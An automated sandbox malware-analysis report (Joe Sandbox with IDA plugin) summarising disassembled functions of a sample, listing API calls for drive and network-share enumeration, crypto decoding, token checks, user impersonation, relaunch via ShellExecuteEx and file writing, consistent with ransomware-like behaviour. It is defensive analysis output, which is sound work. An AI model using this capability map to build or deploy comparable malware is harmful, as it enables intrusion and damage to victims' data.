                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2893815906.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                                                • Associated: 00000000.00000002.2893788364.0000000000270000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2893839178.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2893862300.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2893881571.000000000028E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2893901986.000000000029B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_270000_myfile.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: time$Time$BeginPeriodSleep
                                                                • String ID:
                                                                • API String ID: 4118631919-0
                                                                • Opcode ID: 38af1593eadfbd52e3ea11d8c9500ed03efbcd072b23f9dfacada38fd6b1bc3b
                                                                • Instruction ID: 811896b50990aa1e387f9288222a49ed6489c4115697f7ec4c1f42ed3122d1d2
                                                                • Opcode Fuzzy Hash: 38af1593eadfbd52e3ea11d8c9500ed03efbcd072b23f9dfacada38fd6b1bc3b
                                                                • Instruction Fuzzy Hash: 13C012394465104FD3203B70BC0E7983E20DB007A6F254010F905861E09B714C808BF1

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 378 273f3c-273f50 379 273f51-273f53 378->379 380 273f55-273f57 379->380 381 273f7b-273f8f 379->381 384 273f5d-273f6e call 273c1e 380->384 385 27400b-27400e 380->385 382 273f91-273f97 381->382 383 273ffd-274004 381->383 386 273f99-273faf GetDriveTypeW call 2764df 382->386 387 274006 383->387 388 274011-274019 383->388 384->385 393 273f74-273f79 384->393 385->388 394 273fb1-273fb3 386->394 395 273fe9-273ff9 386->395 387->379 393->381 396 273fe5-273fe6 394->396 397 273fb5-273fd8 GetDiskFreeSpaceExW 394->397 395->386 398 273ffb-273ffc 395->398 396->395 397->396 399 273fda-273fe2 397->399 398->383 399->396
                                                                APIs
                                                                • GetDriveTypeW.KERNEL32(?,00000001,00000000,0028C040,?,?,?,?,00271970,?), ref: 00273F9D
                                                                • GetDiskFreeSpaceExW.KERNEL32(?,?,00000006,0000000E,?,?,?,?,00271970,?), ref: 00273FD0
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2893815906.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                                                • Associated: 00000000.00000002.2893788364.0000000000270000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2893839178.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2893862300.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2893881571.000000000028E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2893901986.000000000029B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_270000_myfile.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: DiskDriveFreeSpaceType
                                                                • String ID: A:\
                                                                • API String ID: 1419299958-3379428675
                                                                • Opcode ID: 0b43b94a7e1cd805d85161698ba1e5c082dbddf74e65c489f96d21ec100fc986
                                                                • Instruction ID: ae74b98e287e874d7b5eae217d377e78213475940f0c9c2c9496f9cd223e0fd7
                                                                • Opcode Fuzzy Hash: 0b43b94a7e1cd805d85161698ba1e5c082dbddf74e65c489f96d21ec100fc986
                                                                • Instruction Fuzzy Hash: 0B2182B6E1031B9FCB14DFA9D844AAFF7B8FF44750B14822AE908D7200D7309A518BA0

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 419 274668-274683 CreateToolhelp32Snapshot 420 274685-274687 419->420 421 274689-2746a1 Process32FirstW 419->421 422 2746d9-2746de 420->422 423 2746cc-2746ce 421->423 424 2746a3-2746b6 423->424 425 2746d0-2746d1 call 273db7 423->425 429 2746be-2746c6 Process32NextW 424->429 430 2746b8-2746bc 424->430 428 2746d6-2746d7 425->428 428->422 429->423 430->425 430->429
                                                                APIs
                                                                • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00274678
                                                                • Process32FirstW.KERNEL32(00000000,?), ref: 0027469B
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2893815906.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                                                • Associated: 00000000.00000002.2893788364.0000000000270000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2893839178.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2893862300.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2893881571.000000000028E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2893901986.000000000029B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_270000_myfile.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: CreateFirstProcess32SnapshotToolhelp32
                                                                • String ID:
                                                                • API String ID: 2353314856-0
                                                                • Opcode ID: 5d7145832187ba9022eb81d4aadd86a89b4220872fb8178da2b7da39cd424263
                                                                • Instruction ID: e6029510f462a2ff51fed70d66238d85cad9e777fe101e7031632df5307ed5f3
                                                                • Opcode Fuzzy Hash: 5d7145832187ba9022eb81d4aadd86a89b4220872fb8178da2b7da39cd424263
                                                                • Instruction Fuzzy Hash: 9F0186355165197BDB20BE75FC0DAAE77ACEB4A320F208165FC1DD2180EB708E648EA5
                                                                APIs
                                                                • CryptStringToBinaryW.CRYPT32(?,00000000,00000001,00000000,?,00000000,00000000), ref: 00274D18
                                                                  • Part of subcall function 00273C1E: HeapCreate.KERNEL32(00000000,00100000,00000000,?,00271AA2,?,?,00271AD1), ref: 00273C33
                                                                  • Part of subcall function 00273C1E: GetProcessHeap.KERNEL32(?,00271AA2,?,?,00271AD1), ref: 00273C42
                                                                • CryptStringToBinaryW.CRYPT32(?,00000000,00000001,00000000,?,00000000,00000000), ref: 00274D3F
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2893815906.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                                                • Associated: 00000000.00000002.2893788364.0000000000270000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2893839178.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2893862300.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2893881571.000000000028E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2893901986.000000000029B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_270000_myfile.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: BinaryCryptHeapString$CreateProcess
                                                                • String ID:
                                                                • API String ID: 869147093-0
                                                                • Opcode ID: 352c1ec9275d87637a2395135c3e669c5d1e51e104f6546fabc27f458546d070
                                                                • Instruction ID: 9e4f7578be6df73d2764065628b4aec7279200320bcd19ca87686f9a3c589eda
                                                                • Opcode Fuzzy Hash: 352c1ec9275d87637a2395135c3e669c5d1e51e104f6546fabc27f458546d070
                                                                • Instruction Fuzzy Hash: 7EF0817621011EBFEB215E55ECC0DABBB5CDF017A4B148025B91CDA110D771CD109BB0
                                                                APIs
                                                                • CryptAcquireContextW.ADVAPI32(0028D4A0,00000000,00000000,00000001,F0000000,?,00275948,?,00000030,00000000,?,?,00275784,?,00000020,00000000), ref: 00274924
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2893815906.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                                                • Associated: 00000000.00000002.2893788364.0000000000270000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2893839178.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2893862300.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2893881571.000000000028E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2893901986.000000000029B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_270000_myfile.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: AcquireContextCrypt
                                                                • String ID:
                                                                • API String ID: 3951991833-0
                                                                • Opcode ID: e479ecee359bac6e96065e048281f208887dd12f427a93bd42331ae9b7482d15
                                                                • Instruction ID: 8e0357bdf4b3730421ca29ea03e74703ecf76e60d297f828941b24259b820651
                                                                • Opcode Fuzzy Hash: e479ecee359bac6e96065e048281f208887dd12f427a93bd42331ae9b7482d15
                                                                • Instruction Fuzzy Hash: 67F044361A520ABADF107F64FC05B693B99AB02769F20C011F60C984E1E772A570A744
                                                                APIs
                                                                • HeapCreate.KERNEL32(00000000,00100000,00000000,?,00271AA2,?,?,00271AD1), ref: 00273C33
                                                                • GetProcessHeap.KERNEL32(?,00271AA2,?,?,00271AD1), ref: 00273C42
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2893815906.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                                                • Associated: 00000000.00000002.2893788364.0000000000270000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2893839178.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2893862300.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2893881571.000000000028E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2893901986.000000000029B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_270000_myfile.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: Heap$CreateProcess
                                                                • String ID:
                                                                • API String ID: 1042935442-0
                                                                • Opcode ID: b08a091f9296c0ca91c0dee9be4f725a03caa92f24bf296d98de6462749985f1
                                                                • Instruction ID: 579d8b1519194c3a8817c460015494e1dff54dec6b000d21f8efd1144b80bb22
                                                                • Opcode Fuzzy Hash: b08a091f9296c0ca91c0dee9be4f725a03caa92f24bf296d98de6462749985f1
                                                                • Instruction Fuzzy Hash: 53E01A3A12A305AAE711DFA6FD0FB103BA8B704716F20401AF50C961F2D7B1A1989B69
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2893815906.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                                                • Associated: 00000000.00000002.2893788364.0000000000270000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2893839178.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2893862300.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2893881571.000000000028E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2893901986.000000000029B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_270000_myfile.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID:
                                                                • String ID: -
                                                                • API String ID: 0-2547889144
                                                                • Opcode ID: 18c7f307279346e8e9996a887a9c045ae03099287260d5d46b83e0dfc9fe3a88
                                                                • Instruction ID: 28ad6be363c81816e18f768c35a2d1476d42a16867fbdd2185d375dd8b5a5b83
                                                                • Opcode Fuzzy Hash: 18c7f307279346e8e9996a887a9c045ae03099287260d5d46b83e0dfc9fe3a88
                                                                • Instruction Fuzzy Hash: 2A82E171D2061A8FDB26CFA8C8807EEBBB5FF85320F14C15AD469A7281D3349965CB52
                                                                APIs
                                                                  • Part of subcall function 00273C1E: HeapCreate.KERNEL32(00000000,00100000,00000000,?,00271AA2,?,?,00271AD1), ref: 00273C33
                                                                  • Part of subcall function 00273C1E: GetProcessHeap.KERNEL32(?,00271AA2,?,?,00271AD1), ref: 00273C42
                                                                • GetUserNameW.ADVAPI32(00000000,002718BC), ref: 002743AD
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2893815906.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                                                • Associated: 00000000.00000002.2893788364.0000000000270000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2893839178.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2893862300.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2893881571.000000000028E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2893901986.000000000029B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_270000_myfile.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: Heap$CreateNameProcessUser
                                                                • String ID:
                                                                • API String ID: 499767188-0
                                                                • Opcode ID: 1eddb68c3390aa34667950e6b74886a1ed8909a71a7b8cff24eb3ef0f891b3c1
                                                                • Instruction ID: d993370f69929b9f958a5b2e7a6563dc9d64568e189814ae23cf4929f40a6e21
                                                                • Opcode Fuzzy Hash: 1eddb68c3390aa34667950e6b74886a1ed8909a71a7b8cff24eb3ef0f891b3c1
                                                                • Instruction Fuzzy Hash: 03E08632A23639A79625EAA5AC0999EB69CCB01B60B10429AFC08E7241D7B45F5016E5

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 31 2736f6-273710 GetObjectW 32 2738a6-2738aa 31->32 33 273716-273728 31->33 34 27372e-273734 33->34 35 27372a-27372c 33->35 36 273736-27373c 34->36 37 273754-273761 34->37 35->37 36->37 38 27373e-273744 36->38 39 273762-273794 LocalAlloc 37->39 38->37 40 273746-273749 38->40 41 273796-27379a 39->41 42 27379d-2737cd GlobalAlloc 39->42 43 273751-273753 40->43 44 27374b-27374f 40->44 41->42 45 2738a4-2738a5 42->45 46 2737d3-2737ea GetDIBits 42->46 43->37 44->39 45->32 46->45 47 2737f0-27380d CreateFileW 46->47 47->45 48 273813-273857 WriteFile 47->48 49 273876-273877 48->49 50 273859-273874 WriteFile 48->50 52 27388f-273895 call 273db7 49->52 50->49 51 273879-27388d WriteFile 50->51 51->52 54 273897-27389e call 273db7 GlobalFree 51->54 52->45 54->45
                                                                APIs
                                                                • GetObjectW.GDI32(00000000,00000018,?), ref: 00273708
                                                                • LocalAlloc.KERNEL32(00000040,00000001,00000000,00000000,?,?,?,?,?,?,00273B80,?,00000000,00000000), ref: 00273764
                                                                • GlobalAlloc.KERNEL32(00000000,?,?,?,?,?,?,?,00273B80,?,00000000,00000000), ref: 002737C3
                                                                • GetDIBits.GDI32(00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 002737E2
                                                                • CreateFileW.KERNEL32(?,C0000000,00000000,00000000,00000002,00000080,00000000,?,?,?,?,?,?,00273B80,?,00000000), ref: 00273802
                                                                • WriteFile.KERNEL32(00000000,00273B80,0000000E,?,00000000,?,?,?,?,?,?,00273B80,?,00000000,00000000), ref: 0027384F
                                                                • WriteFile.KERNEL32(00000000,00000000,?,?,00000000,?,?,?,?,?,?,00273B80,?,00000000,00000000), ref: 0027386C
                                                                • WriteFile.KERNEL32(00000000,00000000,?,?,00000000,?,?,?,?,?,?,00273B80,?,00000000,00000000), ref: 00273884
                                                                • GlobalFree.KERNELBASE(00000000), ref: 0027389E
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2893815906.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                                                • Associated: 00000000.00000002.2893788364.0000000000270000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2893839178.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2893862300.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2893881571.000000000028E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2893901986.000000000029B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_270000_myfile.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: File$Write$AllocGlobal$BitsCreateFreeLocalObject
                                                                • String ID:
                                                                • API String ID: 351847640-0
                                                                • Opcode ID: 8154c0ef136704e57c5fafbb4226c4795dbcee48e886e3c71c121f915b1c9bdf
                                                                • Instruction ID: b87eecb6f13844f4e9fecf7416198e1211984824bbf685d6b3741d9de65b8038
                                                                • Opcode Fuzzy Hash: 8154c0ef136704e57c5fafbb4226c4795dbcee48e886e3c71c121f915b1c9bdf
                                                                • Instruction Fuzzy Hash: 6751D1B9610215ABD724DF65DC49FABB7F8EF48710F10801AF589C7250D770DA15DB20

                                                                Control-flow Graph

                                                                APIs
                                                                • GetCurrentProcess.KERNEL32 ref: 00274B81
                                                                  • Part of subcall function 0027401A: OpenProcessToken.ADVAPI32(00000000,00000008,00000000,00274BA2,00000000), ref: 0027402D
                                                                  • Part of subcall function 0027401A: GetTokenInformation.KERNELBASE(?,00000012(TokenIntegrityLevel),00000000,00000004,?), ref: 00274046
                                                                  • Part of subcall function 00274122: OpenProcessToken.ADVAPI32(00000000,00000008,?), ref: 00274134
                                                                  • Part of subcall function 00274122: GetTokenInformation.KERNELBASE(?,00000019(TokenIntegrityLevel),?,0000004C,00000000), ref: 0027414D
                                                                  • Part of subcall function 00274122: IsValidSid.ADVAPI32(?,00000000), ref: 0027415C
                                                                  • Part of subcall function 002748EF: ReleaseMutex.KERNEL32(00274BC5), ref: 002748F5
                                                                  • Part of subcall function 002741F5: GetModuleFileNameW.KERNEL32(?,00000000,00000001,00000000,?,00000000,?,00274BD1,00000000,?), ref: 00274214
                                                                • ExitProcess.KERNEL32 ref: 00274BDA
                                                                • GetForegroundWindow.USER32 ref: 00274C11
                                                                • ShellExecuteExW.SHELL32(0000003C), ref: 00274C49
                                                                • ExitProcess.KERNEL32 ref: 00274C62
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2893815906.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                                                • Associated: 00000000.00000002.2893788364.0000000000270000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2893839178.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2893862300.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2893881571.000000000028E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2893901986.000000000029B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_270000_myfile.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: Process$Token$ExitInformationOpen$CurrentExecuteFileForegroundModuleMutexNameReleaseShellValidWindow
                                                                • String ID: <
                                                                • API String ID: 491521492-4251816714
                                                                • Opcode ID: 4a1b040f2e55142929ca9e2ca2d6d9447db44d3c6ae8d998840bcc995c96596e
                                                                • Instruction ID: 367699fa5a65a7e66eca6a82a00505174d1a65d76b31ca3a3c2d6ea3c0983de7
                                                                • Opcode Fuzzy Hash: 4a1b040f2e55142929ca9e2ca2d6d9447db44d3c6ae8d998840bcc995c96596e
                                                                • Instruction Fuzzy Hash: 652151B5C112189BDB11FFA9D8856DEBAB8FF09710F50842FE409B2241DB348A518F65

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 111 27667a-276695 WNetOpenEnumW 112 276697-276699 111->112 113 27669e-2766b6 call 273c1e 111->113 114 27673b-27673e 112->114 117 2766c5-2766c6 113->117 118 2766b8-2766c3 WNetCloseEnum 113->118 120 2766c7-2766de WNetEnumResourceW 117->120 119 27673a 118->119 119->114 121 2766e0-2766e5 120->121 122 27671c-276721 120->122 121->120 123 2766e7 121->123 122->120 124 276723-276739 call 273c6b WNetCloseEnum 122->124 126 2766ea-2766ee 123->126 124->119 128 2766f0-2766fb call 27651d 126->128 129 2766fc-276700 126->129 128->129 131 276702-276709 call 27667a 129->131 132 276710-276717 129->132 136 27670e-27670f 131->136 132->126 135 276719 132->135 135->122 136->132
                                                                APIs
                                                                • WNetOpenEnumW.MPR(00000002,00000001,00000000,2,',?), ref: 0027668D
                                                                • WNetCloseEnum.MPR(?), ref: 002766BB
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2893815906.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                                                • Associated: 00000000.00000002.2893788364.0000000000270000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2893839178.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2893862300.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2893881571.000000000028E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2893901986.000000000029B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_270000_myfile.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: Enum$CloseOpen
                                                                • String ID: 2,'
                                                                • API String ID: 1701607978-1150629417
                                                                • Opcode ID: cbc70f3cc916e333c924a64226ac2f6f311e66441c0c1515b33e57c61ad5639f
                                                                • Instruction ID: f0bc87bb16cd9d9ec627f18574cd6f8b0f7409df9cba15e531dd931a3ea0fbe1
                                                                • Opcode Fuzzy Hash: cbc70f3cc916e333c924a64226ac2f6f311e66441c0c1515b33e57c61ad5639f
                                                                • Instruction Fuzzy Hash: 44212C3592050AFFEB14DFA4DC4DAADBBBDEF00354F208129F809E2090D7319A60DB20

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 201 2728a9-2728b9 202 2728c5-2728d7 call 27616f 201->202 203 2728bb 201->203 208 2728fa-2728fe 202->208 204 2728c2 203->204 205 2728bd-2728c0 203->205 204->202 205->202 205->204 209 272900-272910 208->209 210 2728d9-2728e1 RtlGetLastWin32Error 208->210 211 27294d-272968 call 2761ea 209->211 212 2728e3-2728f7 call 274954 call 27616f 210->212 213 272912-272914 210->213 220 272916-272926 RtlGetLastWin32Error 211->220 221 27296a-272970 call 272986 211->221 212->208 214 272973-272979 213->214 223 27297a-27297c call 276183 220->223 224 272928-27292b 220->224 229 272972 221->229 230 272981-272984 223->230 224->211 228 27292d-272937 GetFileAttributesW 224->228 228->223 231 272939-27293b 228->231 229->214 230->229 231->211 232 27293d-27294b SetFileAttributesW 231->232 232->211 232->223
                                                                APIs
                                                                • RtlGetLastWin32Error.NTDLL ref: 002728D9
                                                                • RtlGetLastWin32Error.NTDLL ref: 00272916
                                                                • GetFileAttributesW.KERNEL32(?), ref: 0027292E
                                                                • SetFileAttributesW.KERNEL32(?,00000080), ref: 00272943
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2893815906.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                                                • Associated: 00000000.00000002.2893788364.0000000000270000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2893839178.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2893862300.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2893881571.000000000028E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2893901986.000000000029B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_270000_myfile.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: AttributesErrorFileLastWin32
                                                                • String ID:
                                                                • API String ID: 1414104876-0
                                                                • Opcode ID: 7c5a874cfdef404ce8ccf62b2c56b5d7743e4cd2efa8b321c95f446f133e6751
                                                                • Instruction ID: 1c1bc3ac0b3867d169ae9e06049d541ad15adad7211ae9dc95599b5b43406cb4
                                                                • Opcode Fuzzy Hash: 7c5a874cfdef404ce8ccf62b2c56b5d7743e4cd2efa8b321c95f446f133e6751
                                                                • Instruction Fuzzy Hash: 67210731521607EBDB10AE549C85BAF335CEF44361F38C525FA0DA6291DB31CD784A71

                                                                Control-flow Graph

                                                                APIs
                                                                • GetCurrentProcess.KERNEL32 ref: 002743EE
                                                                  • Part of subcall function 00274122: OpenProcessToken.ADVAPI32(00000000,00000008,?), ref: 00274134
                                                                  • Part of subcall function 00274122: GetTokenInformation.KERNELBASE(?,00000019(TokenIntegrityLevel),?,0000004C,00000000), ref: 0027414D
                                                                  • Part of subcall function 00274122: IsValidSid.ADVAPI32(?,00000000), ref: 0027415C
                                                                • OpenProcess.KERNEL32(02000000,00000000,00000000), ref: 00274414
                                                                • OpenProcessToken.ADVAPI32(00000000,000F01FF,?), ref: 0027442E
                                                                • ImpersonateLoggedOnUser.ADVAPI32(?), ref: 00274445
                                                                  • Part of subcall function 00273DB7: FindCloseChangeNotification.KERNEL32(00000000), ref: 00273DC3
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2893815906.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                                                • Associated: 00000000.00000002.2893788364.0000000000270000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2893839178.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2893862300.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2893881571.000000000028E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2893901986.000000000029B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_270000_myfile.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: Process$OpenToken$ChangeCloseCurrentFindImpersonateInformationLoggedNotificationUserValid
                                                                • String ID:
                                                                • API String ID: 2901522712-0
                                                                • Opcode ID: d77f392ca451dc48d0d00b4a9e0fc44f0bd67a07b1564ae922b39e125fffd63b
                                                                • Instruction ID: c7b4c94f274e8013bb4c0d8cb8ed56c4753a3a8af2f536b4e1b348e6db9c030e
                                                                • Opcode Fuzzy Hash: d77f392ca451dc48d0d00b4a9e0fc44f0bd67a07b1564ae922b39e125fffd63b
                                                                • Instruction Fuzzy Hash: 8711A5379602096BDB14BAF4AC4AFAE726CAF44B11F208025FD0DE2191EB74DA606761

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 253 2747ce-2747ed RegOpenKeyExW 254 274844-27484b 253->254 255 2747ef-274807 RegQueryValueExW 253->255 256 27483a-274843 RegCloseKey 255->256 257 274809-27480b 255->257 256->254 257->256 258 27480d-274819 call 273c1e 257->258 258->256 261 27481b-27482f RegQueryValueExW 258->261 261->256 262 274831-274838 call 273c6b 261->262 262->256
                                                                APIs
                                                                • RegOpenKeyExW.KERNEL32(0000000A,00000005,00000000,00000001,?,0028C040,00000000,?,?,002722A9,80000002,?,?,?,?,0028C040), ref: 002747E5
                                                                • RegQueryValueExW.KERNEL32(?,000003A9,00000000,0028C040,00000000,?,80000002,?,?,002722A9,80000002,?,?,?,?,0028C040), ref: 002747FF
                                                                • RegCloseKey.KERNEL32(?,?,?,002722A9,80000002,?,?,?,?,0028C040,000003A9,00000005,0000000A,?), ref: 0027483D
                                                                  • Part of subcall function 00273C1E: HeapCreate.KERNEL32(00000000,00100000,00000000,?,00271AA2,?,?,00271AD1), ref: 00273C33
                                                                  • Part of subcall function 00273C1E: GetProcessHeap.KERNEL32(?,00271AA2,?,?,00271AD1), ref: 00273C42
                                                                • RegQueryValueExW.KERNEL32(?,000003A9,00000000,0028C040,00000000,?,?,?,002722A9,80000002,?,?,?,?,0028C040,000003A9), ref: 00274827
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2893815906.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                                                • Associated: 00000000.00000002.2893788364.0000000000270000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2893839178.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2893862300.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
